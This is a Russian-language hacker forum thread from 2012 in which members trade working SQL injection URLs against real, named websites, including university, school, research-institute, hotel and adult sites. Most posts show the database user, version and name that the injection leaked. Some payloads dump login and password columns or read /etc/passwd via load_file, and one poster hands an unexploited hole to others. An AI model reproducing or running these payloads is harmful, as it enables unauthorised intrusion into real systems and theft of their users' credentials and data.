 |
|
25.06.2012, 17:50
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 10
Провел на форуме:
58602
Репутация:
1
|
|
EDU, pr-4 :
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//student.bard.edu/clubs/templates/template2.php?id=-1201'+union+select+concat_ws(CHAR(32,58,32),user(),version(),database())+--+[/COLOR][/COLOR]
Результат в сорцах:
Сообщение от None
stuwww@student01.bard.edu : 5.0.77-log : tools_new
|
|
|
25.06.2012, 19:23
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
Провел на форуме:
103014
Репутация:
76
|
|
ТИЦ == 10, PR == 4;
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.kenston.k12.oh.us/khs/kenston.high.school.photo.gallery.php?id=1041'+and+(select+1+from(select+count(*),concat(database(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+h[/COLOR][/COLOR]
|
|
|
|
28.06.2012, 00:12
|
|
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885
Репутация:
34
|
|
lizaalert.org/article.asp?sf=4&sfp=13&id=4++UNION+SELECT+1,2,3,4 ,5,6,concat(user(),version(),database()),8,9,10,11 ,12,13,14+LIMIT+1,1--
jourroot@70.38.11.1855.1.45-communitysitecont
soft-ufa.ru/?type=page&method=show&id=4++UNION+SELECT+1,concat (user(),version(),database()),3+limit+1,1--
mnetcat_soft@localhost5.0.26-logmnetcat_soft
|
|
|
|
28.06.2012, 00:28
|
|
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076
Репутация:
42
|
|
Cайт посвящённый косплею.
Код:
http://www.cosplace.net/coscraft.php?id=1488-666+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8--
Database Version: 5.0.67-percona-highperf-b7-log
Database name: cosplace
User name: cosplace@localhost
ТИЦ: 10
PR: 2
Институт вычислительных технологий СО РАН.
Вывод результата в названии файла.
Т.к. кол-во символов в названии файла режется - пишу по частям:
Код:
http://www.ict.nsc.ru/jct/getfile.php?id=1-1.1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT(Version())--
Код:
http://www.ict.nsc.ru/jct/getfile.php?id=1-1.1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT(Database())--
Код:
http://www.ict.nsc.ru/jct/getfile.php?id=1-1.1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT(User())--
Database Version: 4.0.17
Database name: jct
User name: jct@www.ict.nsc.ru
ТИЦ: 1800
PR: 6 |
|
|
|
28.06.2012, 18:31
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
Провел на форуме:
103014
Репутация:
76
|
|
TИЦ == 10, PR == 2;
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.victoriya-security.ru/eng/consultation.php?id=-28'+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables--+h[/COLOR][/COLOR]
TИЦ == 10, PR == 2;
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//abkteh.ru/videonabludenie/?vid=-10+union+select+1,2,concat_ws(0x03a,login,password,status),4,5,6,7,8,9+from+users+limit+1,1--[/COLOR][/COLOR]
|
|
|
|
28.06.2012, 20:47
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
BEEG.COM - порнушный трафик-холдер
Яндекс тИЦ: 10
Google Page Rank: 4
Доля интеренет трафа: 0.2% - 5-12 миллионов посетителей в день
Выжал за 3 месяца на полную, но скуля осталась. Забирайте.
Error Based XPATH SQLi
Сообщение от None
http://beeg.com/?id=-1'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING( group_concat(remoteaddr),1,31))from(workers_info)) )))And(1)='1
Уязвимое поле: GET
Сообщение от None
5.5.21-log
tube_01
/usr/local/share/mysql/
|
|
|
|
28.06.2012, 21:20
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
www.plugrush.com - еще один порнушный трафик-холдер
Google Page Rank: 2
Доля интернет: 0.03% - 1-2 миллиона посетителей в день (возможно намного больше)
Не добился успеха. Сложная соль, неизвестна админка.
Error Based Duplicate entry SQLi
Сообщение от None
1'and(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/mid(group_concat(table_name),1,64)/**/from/**/information_schema.tables),1,64),floor(rand(0)*2)) )='1
Уязвимое поле: REFERER
Сообщение от None
5.0.77-log
plugleap2
plugleap2@69.55.52.209
- поисковик
Яндекс тИЦ: 10
Google Page Rank: 4
Доля интеренет: 0.015%
Мало трафа, бросил.
Error Based Duplicate column SQLi
Сообщение от None
http://viesearch.com/',(select*from/**/(select(name_const(version(),1)),name_const(versio n(),1))a),'
Уязвимое поле: GET
Сообщение от None
5.0.95-community
|
|
|
|
29.06.2012, 03:46
|
|
Новичок
Регистрация: 25.10.2008
Сообщений: 10
Провел на форуме:
502317
Репутация:
18
|
|
http://www.delreyhotel.com/dining.php?ids=6+UNION+SELECT+CONCAT(0x7873716C696 E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F 2A2A2F,User(),0x7873716C696E6A656E64),2
Database Version: 5.0.95-community
Database name: delrey_delreybd
User name: delrey_delrey@localhost
|
|
|
|
29.06.2012, 14:41
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Lam3rsha
http://www.delreyhotel.com/dining.php?ids=6+UNION+SELECT+CONCAT(0x7873716C696 E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F 2A2A2F,User(),0x7873716C696E6A656E64),2
Database Version: 5.0.95-community
Database name: delrey_delreybd
User name: delrey_delrey@localhost
Xsqlinjbegin5.0.95-community/**/delrey_delreybd/**/delrey_delrey@localhostxsqlinjend
Что за бред?
Не легче 0x3a или 0x3c62723e ?
|
|
|
|
29.06.2012, 16:03
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 10
Провел на форуме:
58602
Репутация:
1
|
|
EDU в магадан
EDU с базой, в т.ч. е-маил..., ничего не фильтруется, mysql-user - root!! советую поковыряться во всех базах... их там много...
user:database:version
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//digilib.stikom.edu/detil.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),database(),version()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+user+--+[/COLOR][/COLOR]
Сообщение от None
root@localhost
cs:5.0.67-0ubuntu6.1
name,password
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//digilib.stikom.edu/detil.php?id=-9+union+select+1,2,3,4,5,6,7,8,UID,Passwd,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+user+--+[/COLOR][/COLOR]
кавычки не фильтруются, File_priv=Y =>
load_file
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//digilib.stikom.edu/detil.php?id=-9+union+select+1,2,3,4,5,6,7,8,load_file('/etc/passwd'),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+user+--+[/COLOR][/COLOR]
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
